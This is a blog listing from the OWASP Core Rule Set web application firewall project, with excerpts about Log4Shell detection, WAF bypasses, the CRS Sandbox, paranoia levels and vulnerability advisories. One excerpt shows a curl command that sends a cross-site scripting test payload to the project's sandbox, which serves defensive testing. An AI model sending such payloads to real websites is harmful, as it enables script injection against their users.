We have been updating our detection for the infamous CVE-2021-44228 vulnerability and its siblings for several days now. With the new experimental rule 1005, we think we really have decent detection capabilities now. Read up on this development in the separate blog post CRS and Log4j / Log4Shell / CVE-2021-44228. Right before the log4j CVE …
Public Hunt for log4j / log4shell Evasions / WAF Bypasses Read More »
This is an evolving blog post with infos about the role of CRS in defending against the log4j vulnerabilities that threatens quite all logging JAVA applications. We believe the mitigations and rules suggested below will have you covered up to and including CVE-2021-45105.In January 2022, we have consolidated our knowledge into a pull request with …
The OWASP ModSecurity Core Rule Set project is very happy to present the CRS Sandbox. It's an API that allows you to test an attack payload against CRS without the need to install a ModSecurity box or anything. Here is how to do this: $ curl -H "x-format-output: txt-matched-rules" "https://sandbox.coreruleset.org/?search=<script>alert('CRS+Sandbox+Release')</script>"941100 PL1 XSS Attack Detected via …
The OWASP ModSecurity Core Rule Set team met for a one week developer retreat in the Swiss mountains to hack away at CRS together. We worked on several larger projects and ran seven additional workshops, all documented on our GitHub wiki. Why Switzerland? Switzerland is an expensive place, but most of our active developers live …
Paranoia Levels are an essential concept when working with the Core Rule Set. This blog post will explain the concept behind Paranoia Levels and how you can work with them on a practical level. Introduction to Paranoia Levels In essence, the Paranoia Level (PL) allows you to define how aggressive the Core Rule Set is. …
Version 2.4.49 of the Apache webserver is affected by a path traversal vulnerability. This caught a lot of people on the left foot. Well not those who protect their services with CRS. CRS has your back for this new exploit too - as very often. There are a lot of proof of concept exploits for …
There is a severe security issue in our rule set. It has been present since the release of CRS 3.1.0 and was recently brought to our attention. Here is the official advisory that we are also publishing as CVE-2021-35368 via MITRE (as usual, MITRE will take a few days until they publish this). Offical Advisory …
CVE-2021-35368 – CRS Request Body Bypass (Update) Read More »
The following is a contributing blog post by Floriane Gilliéron. You can reach Floriane via firstname dot lastname at gmail.com. My Master Thesis from EPFL tackled the challenge of using machine learning to improve the performance of a ModSecurity web application firewall, used with the OWASP Core Rule Set. The initiators of the project were …
A new attempt to combine the CRS with machine learning Read More »
CRS is an open source project that struggles to address the issues reported by the community just like so many other open source communities. Everybody enjoys to develop new features (rules!), but grinding away at solving false positives is not necessarily a favorite past time for us. We are falling behind with providing solutions to …
The OWASP ModSecurity Core Rule Set (CRS) project is proud to announce its first Gold Sponsor: NGINX. CRS is a set of generic attack detection rules for use with ModSecurity or compatible web application firewalls that is distributed under an Open Source license. Dubbed the first line of defense, CRS is the most widspread WAF …